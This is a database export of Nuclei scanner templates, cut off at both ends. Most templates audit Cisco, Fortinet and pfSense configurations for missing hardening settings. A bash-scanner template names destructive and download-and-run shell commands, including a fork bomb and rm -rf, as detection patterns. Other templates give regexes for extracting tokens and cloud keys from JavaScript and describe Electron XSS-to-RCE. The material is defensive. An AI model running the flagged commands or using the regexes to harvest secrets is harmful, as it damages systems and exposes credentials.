"2c3dfeb5acbcc47110e879085f6187f7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb7" }, "name": "disable-ip-source-route.yaml", "content": "id: disable-ip-source-route\n\ninfo:\n name: Cisco Disable IP Source-Route - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: Disable IP source-route where appropriate.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"no ip source-route\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 490a00463044022043714e496a52c4e5fe911cf1b513eade243f568f1d04df11ffbdf6299e92c427022047e44b938e9b7ce54e67453056f915d622b735462692e5f78d1259d05cbe5f6a:922c64590222798bb761d5b6d8e72950", "hash": "14d4b59c67097d3d1df44f1671a56d80", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb8" }, "name": "disable-pad-service.yaml", "content": "id: disable-pad-service\n\ninfo:\n name: Cisco Disable PAD - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.\n reference:\n - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"no service pad\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 490a00463044022070f306accb37b7814673b232c0eead5da6b9f17e2ad29e4f76d58404ff0ea9e3022063cc46413c8f53d3222b0faa1513058c7918676b09420b6606f98bdb08086b5c:922c64590222798bb761d5b6d8e72950", "hash": "4c0e4fd9ffdd768cf29592725875ddc0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb9" }, "name": "enable-secret-for-user-and-password.yaml", "content": "id: enable-secret-for-user-and-password\n\ninfo:\n name: Enable and User Password with Secret\n author: pussycat0x\n severity: info\n description: |\n To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.\n reference:\n - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm\n tags: file,audit,cisco,config-audit,cisco-switch,router\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"enable secret\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n# digest: 4b0a00483046022100b93eaa86472a91e4cb3f4f368ca0bbb46f17dd05bf3d86f5898d0e2a6954f82b022100b6210c48f41b36aba9adb9ec0999b83944ca73c7996db8b69a442dd69372df9c:922c64590222798bb761d5b6d8e72950", "hash": "7e185fe2839633cf00e403a5682e8049", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cba" }, "name": "logging-enable.yaml", "content": "id: logging-enable\n\ninfo:\n name: Cisco Logging Enable - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"logging enable\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4a0a004730450220276f016c51a3f4cdd89c4c2468f6ce29ed3ed2967fc2fdf7af8bb2662410940b0221008acdae1b017dd53af2780a9d3bd87f930f7bd55acea47d4b40cdb65c91b54a0d:922c64590222798bb761d5b6d8e72950", "hash": "658e7ef8c74bf46dd7046a179953a6ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbb" }, "name": "set-and-secure-passwords.yaml", "content": "id: set-and-secure-passwords\n\ninfo:\n name: Cisco Set and Secure Password - Detect\n author: pussycat0x\n severity: info\n description: |\n Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.\n reference:\n - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,file,cisco,config-audit,cisco-switch\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"service password-encryption\"\n negative: true\n\n - type: word\n words:\n - \"configure terminal\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4b0a00483046022100efdfaccc895a5ecc59a52d4539a4c09b63d234684db78a580016862fb5e317600221009a3a6c7fb3111578da8bff93c055c86b6f51a0ac995ae2f78870298c49422e89:922c64590222798bb761d5b6d8e72950", "hash": "010d7f792a6f7901880f5ab88ec0ce87", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbc" }, "name": "auto-usb-install.yaml", "content": "id: auto-usb-install\n\ninfo:\n name: Fortinet Auto USB Installation Enabled - Detect\n author: pussycat0x\n severity: info\n description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set auto-install-config disable\"\n - \"set auto-install-image disable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502207705ba820df9f78c5d686bb2cf0a2945360c63e2774a2bd9984e2b676dfc3a71022100f9dc533ffa5f2fe96faee48a7249bf2982a55b89e7d5f40e7f49330d47dc5d2c:922c64590222798bb761d5b6d8e72950", "hash": "c31e11fa3bdc8476e058150dea20e95c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbd" }, "name": "heuristic-scan.yaml", "content": "id: heuristic-scan\n\ninfo:\n name: Fortinet Heuristic Scanning not Configured - Detect\n author: pussycat0x\n severity: info\n description: |\n Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"config antivirus heuristic\"\n - \"set mode block\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4b0a00483046022100f4ec56fac28c66a16f4465dc3f38dfa1e32914d9a9f4a920eecfcd7531fd8eb1022100ded6bebd35754564f8d3f44d45f442fd0e8b1bd377f5da1d2013659cc8eea484:922c64590222798bb761d5b6d8e72950", "hash": "6c2cf6483a2547427227ead03953c133", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbe" }, "name": "inactivity-timeout.yaml", "content": "id: inactivity-timeout\n\ninfo:\n name: Fortinet Inactivity Timeout Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-console-timeout\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n\n# Enhanced by md on 2023/05/03\n# digest: 4a0a00473045022041387e7ef55b094494bcfb9a6eae4ff8ad3c74272b997521e525cfbbeccc90cf022100db5505a6eef5616090297755b5660c0a7365fbde04b2bf137704f64913258eff:922c64590222798bb761d5b6d8e72950", "hash": "547f5c2602623299b769b28048f698f4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cbf" }, "name": "maintainer-account.yaml", "content": "id: maintainer-account\n\ninfo:\n name: Fortinet Maintainer Account Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI.\n reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-maintainer\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502210089379903b0135adfb1a8bd3e2d4a590950d73ab241cdceabd0c397e6912349f60220557b68a43baf7c7c7e01590b8751530c0f840c1ff27b2d604ee368501fb8a61e:922c64590222798bb761d5b6d8e72950", "hash": "6bd4c07491d75ecd0ff4c7fb1c722b25", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc0" }, "name": "password-policy.yaml", "content": "id: password-policy\n\ninfo:\n name: Fortinet Password Policy Not Set - Detect\n author: pussycat0x\n severity: info\n description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: fortigate,config,audit,file,firewall\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"config system password-policy\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a0047304502204e65bbfdaa2bfe99fe16885a24ff47c4949526d02fadc7b87f6c20a4ba08c4ca022100c0985aaaf07d38f38325fb6bbda5f5b5b2db068356432ff3cf67cb159110cd33:922c64590222798bb761d5b6d8e72950", "hash": "6bdfc5cf2e14058af104db724c98e582", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc1" }, "name": "remote-auth-timeout.yaml", "content": "id: remote-auth-timeout\n\ninfo:\n name: Fortinet Remote Authentication Timeout Not Set - Detect\n author: pussycat0x\n severity: info\n description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference:\n - https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set remoteauthtimeout\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 490a004630440220536fe3e2f19529faa2dad59b0925da645e04a7197e96304c47eb89df2f5f1a8e02202bc21cdd56a7d7194d1573306690289ba0306167ad2eb3cb9ca9728b83b919b2:922c64590222798bb761d5b6d8e72950", "hash": "75ec6bb5cef9aba9e795769b07c250ab", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc2" }, "name": "scp-admin.yaml", "content": "id: scp-admin\n\ninfo:\n name: Fortinet Admin-SCP Disabled - Detect\n author: pussycat0x\n severity: info\n description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file.\n reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set admin-scp enable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4a0a00473045022066b03eab029db2877bcea75f43ae255dae8812134411e467f84b8487e9ec3c61022100d84b44b02b7c57bade8ec9df9cec76874296bd865c80b8af87e45f18e8350d1c:922c64590222798bb761d5b6d8e72950", "hash": "b96abff6598a5cab9bad19943fe07cd0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc3" }, "name": "strong-ciphers.yaml", "content": "id: strong-ciphers\n\ninfo:\n name: HTTPS/SSH Strong Ciphers Not Enabled\n author: pussycat0x\n severity: info\n description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.\n reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices\n tags: audit,config,file,firewall,fortigate\n\nfile:\n - extensions:\n - conf\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"set strong-crypto enable\"\n negative: true\n\n - type: word\n words:\n - \"config system\"\n - \"config router\"\n - \"config firewall\"\n condition: or\n# digest: 4b0a00483046022100c04b9bbf0bec674b8578767a5dc94cdc2101bdb316d13bdd54fb7da604f5e7c8022100d35a558a808abf032280bdb60e7c9091bc4a2d28966836c4af0f0ac583252b3a:922c64590222798bb761d5b6d8e72950", "hash": "d68a37d5c7e0585d73444645654b9b06", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc4" }, "name": "configure-dns-server.yaml", "content": "id: configure-dns-server\n\ninfo:\n name: DNS Server Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: |\n DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022033cb74c6b00552467f5bc077d514ea4991e3a3222666f07b004e0d7bd978098f022100a10c92466915077df2b21b37b18aabc5d0122bb34af9bec017432af9736b0238:922c64590222798bb761d5b6d8e72950", "hash": "fa2b69a65586cd7d4ad9242e09bb1b3b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc5" }, "name": "configure-session-timeout.yaml", "content": "id: configure-session-timeout\n\ninfo:\n name: PfSense Configure Sessions Timeout Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n Configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"0\"\n condition: or\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a004830460221008eba08b85ba95940807021dd80e8d2aa75fabfbe6706871968b674720671fa85022100cc57c109bd39376341a80bf84d4c5ef3f2a6f396792ca7ea3876860f54cf38d6:922c64590222798bb761d5b6d8e72950", "hash": "d8c23d11a6f4e9fd797477cdf5045fce", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc6" }, "name": "enable-https-protocol.yaml", "content": "id: enable-https-protocol\n\ninfo:\n name: Pfsense Web Admin Management Portal HTTPS Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"https\"\n condition: and\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502202121bc19669faaa0f0e0fc8bc72138f3eb44eea7209ff5bbc2d8121f58350389022100d43403a09e74c0d72f54de7d9dad2e0af0f1fa4ba7ea551188dccde47e010856:922c64590222798bb761d5b6d8e72950", "hash": "0cf23942dab2cf43fa8d29aac046ab0d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc7" }, "name": "known-default-account.yaml", "content": "id: known-default-account\n\ninfo:\n name: PfSense Known Default Account - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'.\n reference: |\n - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: audit,config,file,firewall,pfsense\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"admin\"\n - \"\"\n - \"user-shell-access\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 490a00463044022063556ee4b394affce60a28ef8106e7bafe299aaee1d4e84e1e295562373442bd022068de7e8f0dbacab446bc723067113de16f48cb61438deb36b1fa2a0d79d9236b:922c64590222798bb761d5b6d8e72950", "hash": "708d20e25c0965a75a8de8cd2c591588", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc8" }, "name": "password-protected-consolemenu.yaml", "content": "id: password-protected-consolemenu\n\ninfo:\n name: PfSense Consolemenu Password Protection Not Implememnted - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"1\"\n condition: or\n negative: true\n\n - type: word\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 490a00463044022078bebe23791220eee7587337be7cdd8f3dc36ae8e2fffcb62e57b6d4697609af02202a015c2d5eacb159debb08f84abf1d1a158ded646676fd555d1eae7dfe17007a:922c64590222798bb761d5b6d8e72950", "hash": "faab151d051b4790c00cbb72b2684165", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cc9" }, "name": "set-hostname.yaml", "content": "id: set-hostname\n\ninfo:\n name: PfSense Hostname Not Set - Detect\n author: pussycat0x\n severity: info\n description: |\n PfSense Hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device.\n reference: |\n https://docs.netgate.com/pfsense/en/latest/config/general.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: firewall,config,audit,pfsense,file\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"\"\n - \"domain>\"\n condition: and\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100ef138110a286e5da0fd75606e2bdd7a522477fa1a4cfd60452976fb5d96e8d97022100e02bb223d094d5b9546c6bf6fd8786ed0c6f4fd2c03c943d7073143b81c98e61:922c64590222798bb761d5b6d8e72950", "hash": "26383c8a69dbe268e4e7e3f009f03057", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cca" }, "name": "bash-scanner.yaml", "content": "id: bash-scanner\n\ninfo:\n name: Bash Scanner\n author: ransomsec\n severity: info\n description: Indicator for bash Dangerous Commands – You Should Never Execute on Linux\n reference:\n - https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/\n - https://phoenixnap.com/kb/dangerous-linux-terminal-commands\n tags: bash,file,shell,sh\n\nfile:\n - extensions:\n - sh\n\n extractors:\n - type: regex\n name: fork-bomb\n regex:\n - \":(){:|:&};:\"\n\n - type: regex\n name: rm command found\n regex:\n - \"rm -(f|r)\"\n - \"rm -(fr|rf)\"\n\n - type: regex\n name: code injection\n regex:\n - \"/bin/(sh|bash) -\"\n - \"eval\"\n - \"echo -c\"\n - \"/bin/(sh|bash) -c\"\n - \"(sh|bash) -\"\n - \"(sh|bash) -c\"\n\n - type: regex\n name: file manipulation\n regex:\n - \"cat /dev/null >\"\n\n - type: regex\n name: unknown filedownload\n regex:\n - '(wget|curl) (https?|ftp|file)://[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]\\.[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]$'\n# digest: 4a0a004730450221009ad4de0abc82c172ead956fa70e1a84b3baff31c544569a254f7cf7d255e41cf02200bae7cf84580e9b008236464ea25f105d51c97951521af9c5e96b3ca11a1ad48:922c64590222798bb761d5b6d8e72950", "hash": "c1fc1d075452e45c0d55442f7f117694", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccb" }, "name": "electron-version-detect.yaml", "content": "id: electron-version-detect\n\ninfo:\n name: Electron Version - Detect\n author: me9187\n severity: info\n reference:\n - https://www.electronjs.org/blog/chromium-rce-vulnerability/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: electron,file\n\nfile:\n - extensions:\n - json\n\n extractors:\n - type: regex\n regex:\n - '\"electronVersion\":\"[^\"]*\"'\n# digest: 4b0a00483046022100a93dfde5beb023a02145111d3e9c07e640ec686696e643c5370c9e442e2497d5022100f81edbb6c9bbd6977b3c7955b95aab77938f943b6878f161182fbf0e265d2efa:922c64590222798bb761d5b6d8e72950", "hash": "77f07ba159d8198e2d8b57e99f8bfe4b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccc" }, "name": "node-integration-enabled.yaml", "content": "id: node-integration-enabled\n\ninfo:\n name: Electron Applications - Cross-Site Scripting & Remote Code Execution\n author: me9187\n severity: critical\n description: |\n Electron Applications is susceptible to remote code execution by way of cross-site scripting via nodeIntegration by calling require('child_process').exec('COMMAND');.\n reference:\n - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/\n - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps\n tags: electron,file,nodejs,xss\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"nodeIntegration: true\"\n# digest: 4a0a0047304502204786705d88a14d1888a277cc5d93556cfec1f62f07c6b52fc67bd398eacad084022100d8b0127552cdfea68abfa470f367757cf4d7496dc287ac4826131928c2526233:922c64590222798bb761d5b6d8e72950", "hash": "513e78669f3e5ccc69c8cf3754709f64", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccd" }, "name": "js-analyse.yaml", "content": "id: js-analyse\n\ninfo:\n name: JS Analyse\n author: ayadim\n severity: info\n description: |\n This process involves extracting tokens, endpoints, URIs, and variable names from the JS file and analyzing them for any potential weaknesses that could be exploited. By extracting and analyzing these elements, potential security threats can be identified, allowing for proactive measures to be taken to mitigate any risks associated with the application. This process can be used as part of a comprehensive bug-hunting strategy to ensure the security of an application.\n metadata:\n verified: true\n tags: file,js-analyse,js\n\nfile:\n - extensions:\n - js\n\n extractors:\n - type: regex\n name: extracted-token\n regex:\n - \"(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\\\s)*(:|=)+\"\n\n - type: regex\n name: extracted-endpoints\n regex:\n - \"(?i)('|\\\")((\\\\.{0,2})|([a-z0-9-_]*))/([a-z0-9-_/=:&?\\\\.]+)('|\\\")\"\n - \"(?i)}\\\\s*/[a-z0-9-_?=&/]+\"\n - \"(?i)path\\\\s*(:|=)\\\\s*('|\\\")[a-z0-9-_?=&:\\\\./]+('|\\\")\"\n\n - type: regex\n name: extracted-uri\n regex:\n - \"(?i)([a-z]{2,10}):(//|/)[a-z0-9\\\\./?&-_=:]+\"\n\n - type: regex\n name: amazon-access-key\n regex:\n - \"(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\"\n\n - type: regex\n name: amazon-s3-url\n regex:\n - \"(?i)([a-z0-9_\\\\-\\\\.]+\\\\.s3\\\\.amazonaws\\\\.com)\"\n - \"(?i)([a-z0-9\\\\.-]+\\\\.s3-[a-z0-9-\\\\.]+\\\\.amazonaws\\\\.com)\"\n - \"(?i)[a-z0-9\\\\.-]+\\\\.s3-website[\\\\.-](eu|ap|us|ca|sa|cn)\"\n - \"(?i)(s3://[a-z0-9_\\\\-\\\\./]+)\"\n - \"(?i)(s3\\\\.amazonaws\\\\.com/[a-z0-9/_\\\\-\\\\.]+)\"\n - \"(?i)(s3\\\\.console\\\\.aws\\\\.com/s3/buckets/[a-z0-9/_\\\\-\\\\.]+)\"\n - \"(?i)(s3-[a-z0-9-\\\\.]\\\\.amazonaws\\\\.com/[a-z0-9/_\\\\-\\\\.]+)\"\n\n - type: regex\n name: github-personal-access-token\n regex:\n - \"(?i)(ghp_[a-z0-9]{36}|github_pat_[a-z0-9]{82})\"\n\n - type: regex\n name: github-oauth-access-token\n regex:\n - \"(?i)(gho_[a-zA-Z0-9]{36})\"\n\n - type: regex\n name: github-app-token\n regex:\n - \"\\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\\b\"\n\n - type: regex\n name: authorization-basic\n regex:\n - 